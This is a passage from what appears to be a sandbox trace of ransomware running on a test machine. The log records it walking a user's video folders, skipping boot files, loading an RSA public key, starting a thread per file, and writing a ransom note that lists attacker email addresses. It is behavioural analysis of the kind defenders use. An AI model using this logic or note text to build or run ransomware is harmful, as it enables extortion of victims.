dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e8 [0133.356] WriteFile (in: hFile=0x6e8, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0133.357] CloseHandle (hObject=0x6e8) returned 1 [0133.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0133.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0133.358] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0133.358] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0133.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0133.358] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0133.358] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.358] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.358] lstrcmpW (lpString1="wpc5n64XVm", lpString2="..") returned 1 [0133.358] lstrcmpW (lpString1="wpc5n64XVm", lpString2=".") returned 1 [0133.358] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0133.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0133.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0133.358] SetErrorMode (uMode=0x1) returned 0x1 [0133.358] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0133.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.358] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0133.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3d11398 [0133.360] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0133.360] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0133.360] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.360] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.360] lstrcmpW (lpString1="AmR.swf", lpString2="..") returned 1 [0133.360] lstrcmpW (lpString1="AmR.swf", lpString2=".") returned 1 [0133.360] StrStrW (lpFirst="AmR.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.360] StrStrW (lpFirst="AmR.swf", lpSrch="ntldr") returned 0x0 [0133.360] StrStrW (lpFirst="AmR.swf", lpSrch="NTLDR") returned 0x0 [0133.360] StrStrW (lpFirst="AmR.swf", lpSrch="NTDETECT.COM") returned 0x0 [0133.360] StrStrW (lpFirst="AmR.swf", lpSrch="ntdetect.com") returned 0x0 [0133.360] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0133.360] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0133.360] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0133.360] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.360] lstrcpyW (in: lpString1=0x17addc, lpString2="AmR.swf" | out: lpString1="AmR.swf") returned="AmR.swf" [0133.360] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6dc [0133.361] Sleep (dwMilliseconds=0x96) [0133.510] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.510] lstrcmpW (lpString1="fJw1HV.flv", lpString2="..") returned 1 [0133.510] lstrcmpW (lpString1="fJw1HV.flv", lpString2=".") returned 1 [0133.510] StrStrW (lpFirst="fJw1HV.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.510] StrStrW (lpFirst="fJw1HV.flv", lpSrch="ntldr") returned 0x0 [0133.510] StrStrW (lpFirst="fJw1HV.flv", lpSrch="NTLDR") returned 0x0 [0133.510] StrStrW (lpFirst="fJw1HV.flv", lpSrch="NTDETECT.COM") returned 0x0 [0133.510] StrStrW (lpFirst="fJw1HV.flv", lpSrch="ntdetect.com") returned 0x0 [0133.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0133.510] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0133.510] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0133.510] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.510] lstrcpyW (in: lpString1=0x17addc, lpString2="fJw1HV.flv" | out: lpString1="fJw1HV.flv") returned="fJw1HV.flv" [0133.510] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e4 [0133.511] Sleep (dwMilliseconds=0x96) [0133.666] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.666] lstrcmpW (lpString1="Moq53i08kUE_j1CIf3Zg.avi", lpString2="..") returned 1 [0133.666] lstrcmpW (lpString1="Moq53i08kUE_j1CIf3Zg.avi", lpString2=".") returned 1 [0133.666] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.666] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="ntldr") returned 0x0 [0133.666] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="NTLDR") returned 0x0 [0133.666] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="NTDETECT.COM") returned 0x0 [0133.666] StrStrW (lpFirst="Moq53i08kUE_j1CIf3Zg.avi", lpSrch="ntdetect.com") returned 0x0 [0133.666] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0133.666] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0133.666] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0133.666] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.666] lstrcpyW (in: lpString1=0x17addc, lpString2="Moq53i08kUE_j1CIf3Zg.avi" | out: lpString1="Moq53i08kUE_j1CIf3Zg.avi") returned="Moq53i08kUE_j1CIf3Zg.avi" [0133.666] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0133.667] Sleep (dwMilliseconds=0x96) [0133.822] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.822] lstrcmpW (lpString1="v9PzrbehuH3KFc.mp4", lpString2="..") returned 1 [0133.822] lstrcmpW (lpString1="v9PzrbehuH3KFc.mp4", lpString2=".") returned 1 [0133.822] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.822] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="ntldr") returned 0x0 [0133.822] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="NTLDR") returned 0x0 [0133.822] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0133.822] StrStrW (lpFirst="v9PzrbehuH3KFc.mp4", lpSrch="ntdetect.com") returned 0x0 [0133.822] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0133.822] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0133.822] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned 59 [0133.822] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.822] lstrcpyW (in: lpString1=0x17addc, lpString2="v9PzrbehuH3KFc.mp4" | out: lpString1="v9PzrbehuH3KFc.mp4") returned="v9PzrbehuH3KFc.mp4" [0133.822] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6fc [0133.823] Sleep (dwMilliseconds=0x96) [0133.978] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0133.978] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0133.978] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0133.978] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm" [0133.978] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*" [0133.978] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="Desktop") returned 0x0 [0133.978] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\", lpSrch="DESKTOP") returned 0x0 [0133.978] SetErrorMode (uMode=0x1) returned 0x1 [0133.979] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT") returned 76 [0133.979] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0133.979] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0133.979] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x700) returned 0x0 [0133.979] RegQueryValueExW (in: hKey=0x700, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceb120, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3ceb120*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0133.979] RegCloseKey (hKey=0x700) returned 0x0 [0133.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0133.979] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0133.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0133.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x700 [0133.980] WriteFile (in: hFile=0x700, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0133.980] CloseHandle (hObject=0x700) returned 1 [0133.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3d11398 [0133.980] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm") returned="wpc5n64XVm" [0133.980] lstrcpyW (in: lpString1=0x17a5a4, lpString2="wpc5n64XVm" | out: lpString1="wpc5n64XVm") returned="wpc5n64XVm" [0133.980] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0133.980] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0133.981] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0133.981] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0133.981] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0133.981] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0133.981] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0133.981] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0133.981] FindClose (in: hFindFile=0x3cde358 | out: hFindFile=0x3cde358) returned 1 [0133.981] FindClose (in: hFindFile=0x3cde358 | out: hFindFile=0x3cde358) returned 0 [0133.981] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0133.981] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0133.981] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0133.982] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0133.982] 